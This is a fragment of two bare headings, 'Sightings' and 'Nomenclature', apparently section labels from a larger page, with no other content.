Sightings

Nomenclature